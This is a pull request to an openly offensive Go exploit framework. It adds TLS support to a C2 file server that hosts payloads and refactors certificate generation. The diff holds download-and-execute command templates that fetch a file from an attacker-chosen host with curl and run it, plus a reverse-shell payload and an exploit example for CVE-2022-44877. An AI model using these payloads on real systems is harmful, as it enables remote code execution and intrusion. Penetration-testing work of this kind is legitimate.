### PR TITLE
Support added for HTTPServe using TLS

### DIFF
--- a/.golangci.yml
+++ b/.golangci.yml
@@ -91,4 +91,7 @@ issues:
       linters:
         - staticcheck
       text: SA1019
-
+    - path: c2/httpservefile/httpservefile.go
+      linters:
+        - staticcheck
+      text: SA1019

--- a/c2/httpservefile/httpservefile.go
+++ b/c2/httpservefile/httpservefile.go
@@ -55,8 +55,8 @@ func (httpServer *Server) CreateFlags() {
 	flag.StringVar(&httpServer.FileToServe, "httpServeFile.FileToServe", "", "The file to serve on the HTTP server")
 	flag.StringVar(&httpServer.ServerField, "httpServeFile.ServerField", "Apache", "The value to insert in the HTTP server field")
 	flag.BoolVar(&httpServer.TLS, "httpServeFile.TLS", false, "Indicates if the HTTP server should use encryption")
-	flag.StringVar(&httpServer.PrivateKeyFile, "httpServer.PrivateKeyFile", "", "A private key to use with the HTTPS server")
-	flag.StringVar(&httpServer.CertificateFile, "httpServer.CertificateFile", "", "The certificate to use with the HTTPS server")
+	flag.StringVar(&httpServer.PrivateKeyFile, "httpServeFile.PrivateKeyFile", "", "A private key to use with the HTTPS server")
+	flag.StringVar(&httpServer.CertificateFile, "httpServeFile.CertificateFile", "", "The certificate to use with the HTTPS server")
 }
 
 // load the provided file into memory. Generate the random filename.

--- a/c2/httpservefile/httpservefile.go
+++ b/c2/httpservefile/httpservefile.go
@@ -1,10 +1,11 @@
-// httpservefile c2 spawns an HTTP server and hosts a single user provided file. The normal use case
+// httpservefile c2 spawns an HTTP or HTTPS server and hosts a single user provided file. The normal use case
 // is for an exploit to curl/wget the file and execute it. This is useful to spawn connections to other
 // tools (e.g. Metasploit, nc, etc.). This is not a traditional "c2" but serves as a useful backend that
 // logically plugs into our c2 design.
 package httpservefile
 
 import (
+	"crypto/tls"
 	"flag"
 	"fmt"
 	"net/http"
@@ -12,6 +13,7 @@ import (
 	"path"
 	"time"
 
+	"github.com/vulncheck-oss/go-exploit/encryption"
 	"github.com/vulncheck-oss/go-exploit/output"
 	"github.com/vulncheck-oss/go-exploit/random"
 )
@@ -29,6 +31,12 @@ type Server struct {
 	HTTPPort int
 	// Set to the Server field in HTTP response
 	ServerField string
+	// Indicates if TLS should be enabled
+	TLS bool
+	// The file path to the user provided private key (if provided)
+	PrivateKeyFile string
+	// The file path to the user provided certificate (if provided)
+	CertificateFile string
 }
 
 var singleton *Server
@@ -46,6 +54,9 @@ func GetInstance() *Server {
 func (httpServer *Server) CreateFlags() {
 	flag.StringVar(&httpServer.FileToServe, "httpServeFile.FileToServe", "", "The file to serve on the HTTP server")
 	flag.StringVar(&httpServer.ServerField, "httpServeFile.ServerField", "Apache", "The value to insert in the HTTP server field")
+	flag.BoolVar(&httpServer.TLS, "httpServeFile.TLS", false, "Indicates if the HTTP server should use encryption")
+	flag.StringVar(&httpServer.PrivateKeyFile, "httpServer.PrivateKeyFile", "", "A private key to use with the HTTPS server")
+	flag.StringVar(&httpServer.CertificateFile, "httpServer.CertificateFile", "", "The certificate to use with the HTTPS server")
 }
 
 // load the provided file into memory. Generate the random filename.
@@ -92,10 +103,45 @@ func (httpServer *Server) Run(timeout int) {
 		}
 	})
 
+	var certificate tls.Certificate
+	if httpServer.TLS {
+		var ok bool
+		var err error
+		if len(httpServer.CertificateFile) != 0 && len(httpServer.PrivateKeyFile) != 0 {
+			certificate, err = tls.LoadX509KeyPair(httpServer.CertificateFile, httpServer.PrivateKeyFile)
+			if err != nil {
+				output.PrintfFrameworkError("Error loading certificate: %s", err.Error())
+
+				return
+			}
+		} else {
+			output.PrintFrameworkStatus("Certificate not provided. Generating a TLS Certificate")
+			certificate, ok = encryption.GenerateCertificate()
+			if !ok {
+				return
+			}
+		}
+	}
+
 	connectionString := fmt.Sprintf("%s:%d", httpServer.HTTPAddr, httpServer.HTTPPort)
-	output.PrintfFrameworkStatus("Starting an HTTP Server on %s", connectionString)
 	go func() {
-		_ = http.ListenAndServe(connectionString, nil)
+		if httpServer.TLS {
+			output.PrintfFrameworkStatus("Starting an HTTPS server on %s", connectionString)
+			tlsConfig := &tls.Config{
+				Certificates: []tls.Certificate{certificate},
+				// We have no control over the SSL versions supported on the remote target. Be permissive for more targets.
+				MinVersion: tls.VersionSSL30,
+			}
+			server := http.Server{
+				Addr:      connectionString,
+				TLSConfig: tlsConfig,
+			}
+			defer server.Close()
+			_ = server.ListenAndServeTLS("", "")
+		} else {
+			output.PrintfFrameworkStatus("Starting an HTTP server on %s", connectionString)
+			_ = http.ListenAndServe(connectionString, nil)
+		}
 	}()
 
 	// let the server run for timeout seconds

--- a/c2/sslshell/sslshellserver.go
+++ b/c2/sslshell/sslshellserver.go
@@ -17,22 +17,17 @@
 package sslshell
 
 import (
-	"crypto/rand"
-	"crypto/rsa"
 	"crypto/tls"
-	"crypto/x509"
-	"crypto/x509/pkix"
 	"flag"
 	"fmt"
-	"math/big"
 	"net"
 	"strings"
 	"sync"
 	"time"
 
 	"github.com/vulncheck-oss/go-exploit/c2/cli"
+	"github.com/vulncheck-oss/go-exploit/encryption"
 	"github.com/vulncheck-oss/go-exploit/output"
-	"github.com/vulncheck-oss/go-exploit/random"
 )
 
 type Server struct {
@@ -82,7 +77,7 @@ func (shellServer *Server) Init(ipAddr string, port int, isClient bool) bool {
 		}
 	} else {
 		output.PrintFrameworkStatus("Certificate not provided. Generating a TLS Certificate")
-		certificate, ok = generateCertificate()
+		certificate, ok = encryption.GenerateCertificate()
 		if !ok {
 			return false
 		}
@@ -136,40 +131,6 @@ func (shellServer *Server) Run(timeout int) {
 		output.PrintfFrameworkSuccess("Caught new shell from %v", client.RemoteAddr())
 		go handleSimpleConn(client, &cliLock, client.RemoteAddr())
 	}
-}
-
-func generateCertificate() (tls.Certificate, bool) {
-	privateKey, err := rsa.GenerateKey(rand.Reader, 2048)
-	if err != nil {
-		output.PrintFrameworkError(err.Error())
-
-		return tls.Certificate{}, false
-	}
-
-	template := x509.Certificate{
-		SerialNumber:          big.NewInt(8),
-		Subject:               pkix.Name{CommonName: random.RandLetters(12)},
-		NotBefore:             time.Now(),
-		NotAfter:              time.Now().Add(24 * time.Hour),
-		BasicConstraintsValid: true,
-		IsCA:                  true,
-		KeyUsage:              x509.KeyUsageCertSign | x509.KeyUsageDigitalSignature,
-		ExtKeyUsage:           []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth},
-	}
-
-	certificateBytes, err := x509.CreateCertificate(rand.Reader, &template, &template, &privateKey.PublicKey, privateKey)
-	if err != nil {
-		output.PrintFrameworkError(err.Error())
-
-		return tls.Certificate{}, false
-	}
-
-	certificate := tls.Certificate{
-		Certificate: [][]byte{certificateBytes},
-		PrivateKey:  privateKey,
-	}
-
-	return certificate, true
 }
 
 func handleSimpleConn(conn net.Conn, cliLock *sync.Mutex, remoteAddr net.Addr) {

--- a/encryption/certificate.go
+++ b/encryption/certificate.go
@@ -1,0 +1,48 @@
+package encryption
+
+import (
+	"crypto/rand"
+	"crypto/rsa"
+	"crypto/tls"
+	"crypto/x509"
+	"crypto/x509/pkix"
+	"math/big"
+	"time"
+
+	"github.com/vulncheck-oss/go-exploit/output"
+	"github.com/vulncheck-oss/go-exploit/random"
+)
+
+func GenerateCertificate() (tls.Certificate, bool) {
+	privateKey, err := rsa.GenerateKey(rand.Reader, 2048)
+	if err != nil {
+		output.PrintFrameworkError(err.Error())
+
+		return tls.Certificate{}, false
+	}
+
+	template := x509.Certificate{
+		SerialNumber:          big.NewInt(8),
+		Subject:               pkix.Name{CommonName: random.RandLetters(12)},
+		NotBefore:             time.Now(),
+		NotAfter:              time.Now().Add(24 * time.Hour),
+		BasicConstraintsValid: true,
+		IsCA:                  true,
+		KeyUsage:              x509.KeyUsageCertSign | x509.KeyUsageDigitalSignature,
+		ExtKeyUsage:           []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth},
+	}
+
+	certificateBytes, err := x509.CreateCertificate(rand.Reader, &template, &template, &privateKey.PublicKey, privateKey)
+	if err != nil {
+		output.PrintFrameworkError(err.Error())
+
+		return tls.Certificate{}, false
+	}
+
+	certificate := tls.Certificate{
+		Certificate: [][]byte{certificateBytes},
+		PrivateKey:  privateKey,
+	}
+
+	return certificate, true
+}

--- a/examples/cve-2022-44877/cve-2022-44877.go
+++ b/examples/cve-2022-44877/cve-2022-44877.go
@@ -109,8 +109,9 @@ func generatePayload(conf *config.Config) (string, bool) {
 		generated = payload.BindShellMkfifoNetcat(conf.Bport)
 	case c2.HTTPServeFile:
 		filename := httpservefile.GetInstance().FileName
-		output.PrintfFrameworkStatus("Sending an HTTP download payload to http://%s:%d/%s", conf.Lhost, conf.Lport, filename)
-		generated = payload.LinuxCurlHTTPDownloadAndExecute(conf.Lhost, conf.Lport, filename)
+		addr := protocol.GenerateURL(conf.Lhost, conf.Lport, httpservefile.GetInstance().TLS, "/"+filename)
+		output.PrintfFrameworkStatus("Sending an HTTP download payload to %s", addr)
+		generated = payload.LinuxCurlHTTPDownloadAndExecute(conf.Lhost, conf.Lport, httpservefile.GetInstance().TLS, filename)
 	default:
 		output.PrintFrameworkError("Invalid payload")
 

--- a/payload/download.go
+++ b/payload/download.go
@@ -6,16 +6,24 @@ import (
 	"github.com/vulncheck-oss/go-exploit/random"
 )
 
-func LinuxCurlHTTPDownloadAndExecute(lhost string, lport int, downloadFile string) string {
+func LinuxCurlHTTPDownloadAndExecute(lhost string, lport int, ssl bool, downloadFile string) string {
 	output := "/tmp/" + random.RandLetters(3)
+
+	if ssl {
+		return fmt.Sprintf("curl -kso %s https://%s:%d/%s && chmod +x %s && %s & rm -f %s",
+			output, lhost, lport, downloadFile, output, output, output)
+	}
 
 	return fmt.Sprintf("curl -so %s http://%s:%d/%s && chmod +x %s && %s & rm -f %s",
 		output, lhost, lport, downloadFile, output, output, output)
 }
 
-func WindowsCurlHTTPDownloadAndExecute(lhost string, lport int, downloadFile string) string {
+func WindowsCurlHTTPDownloadAndExecute(lhost string, lport int, ssl bool, downloadFile string) string {
 	output := `%TEMP%\` + random.RandLetters(3) + ".exe"
 
 	// NOTE: Can't delete a file in use
+	if ssl {
+		return fmt.Sprintf("curl.exe -kso %s https://%s:%d/%s && %s & del /f %s", output, lhost, lport, downloadFile, output, output)
+	}
 	return fmt.Sprintf("curl.exe -so %s http://%s:%d/%s && %s & del /f %s", output, lhost, lport, downloadFile, output, output)
 }

--- a/payload/download_test.go
+++ b/payload/download_test.go
@@ -6,7 +6,7 @@ import (
 )
 
 func TestLinuxCurlHTTPDownloadAndExecute(t *testing.T) {
-	curlCommand := LinuxCurlHTTPDownloadAndExecute("127.0.0.1", 1270, "helloworld")
+	curlCommand := LinuxCurlHTTPDownloadAndExecute("127.0.0.1", 1270, false, "helloworld")
 
 	if !strings.HasPrefix(curlCommand, "curl -so") {
 		t.Fatal(curlCommand)
@@ -27,14 +27,54 @@ func TestLinuxCurlHTTPDownloadAndExecute(t *testing.T) {
 	t.Log(curlCommand)
 }
 
+func TestLinuxCurlHTTPSDownloadAndExecute(t *testing.T) {
+	curlCommand := LinuxCurlHTTPDownloadAndExecute("127.0.0.1", 1270, true, "helloworld")
+
+	if !strings.HasPrefix(curlCommand, "curl -kso") {
+		t.Fatal(curlCommand)
+	}
+
+	if !strings.Contains(curlCommand, "https://") {
+		t.Fatal(curlCommand)
+	}
+
+	if !strings.Contains(curlCommand, "chmod +x") {
+		t.Fatal(curlCommand)
+	}
+
+	if !strings.Contains(curlCommand, "rm -f") {
+		t.Fatal(curlCommand)
+	}
+
+	t.Log(curlCommand)
+}
+
 func TestWindowsCurlHTTPDownloadAndExecute(t *testing.T) {
-	curlCommand := WindowsCurlHTTPDownloadAndExecute("127.0.0.1", 1270, "helloworld")
+	curlCommand := WindowsCurlHTTPDownloadAndExecute("127.0.0.1", 1270, false, "helloworld")
 
 	if !strings.HasPrefix(curlCommand, "curl.exe -so") {
 		t.Fatal(curlCommand)
 	}
 
 	if !strings.Contains(curlCommand, "http://") {
+		t.Fatal(curlCommand)
+	}
+
+	if !strings.Contains(curlCommand, "del /f") {
+		t.Fatal(curlCommand)
+	}
+
+	t.Log(curlCommand)
+}
+
+func TestWindowsCurlHTTPSDownloadAndExecute(t *testing.T) {
+	curlCommand := WindowsCurlHTTPDownloadAndExecute("127.0.0.1", 1270, true, "helloworld")
+
+	if !strings.HasPrefix(curlCommand, "curl.exe -kso") {
+		t.Fatal(curlCommand)
+	}
+
+	if !strings.Contains(curlCommand, "https://") {
 		t.Fatal(curlCommand)
 	}
 

--- a/payload/reverse.go
+++ b/payload/reverse.go
@@ -143,7 +143,7 @@ func UnflattenedReversePython27(lhost string, lport int) string {
 		"s.close()\n", lhost, lport)
 }
 
-// An unflattened reverse shell that works on Python 2.7, 3+, Windows and Linux.
+// An unflattened reverse shell that uses an SSL socket, works on Python 2.7, 3+, Windows and Linux.
 func UnflattenedSecureReversePython27(lhost string, lport int) string {
 	return fmt.Sprintf("import socket\n"+
 		"import subprocess\n"+


### PR DESCRIPTION
Addresses #20 

Broke download and exec API, but its for the best.

HTTPServer usage didn't change much. Basically there is a TLS option that defaults to false.  Usage is like so when generating a payload in exploit:

```go
generated = payload.LinuxCurlHTTPDownloadAndExecute(
    conf.Lhost, conf.Lport, httpservefile.GetInstance().TLS, httpservefile.GetInstance().FileName)
```

Command line only changes if you specify TLS:

```sh
./build/cve-2023-30801_linux-arm64 -e -rhost 10.9.49.133 -lhost 10.9.49.134 -lport 8181 -httpServeFile.FileToServe ./build/reverse_shell_windows-amd64.exe -httpServeFile.TLS true
```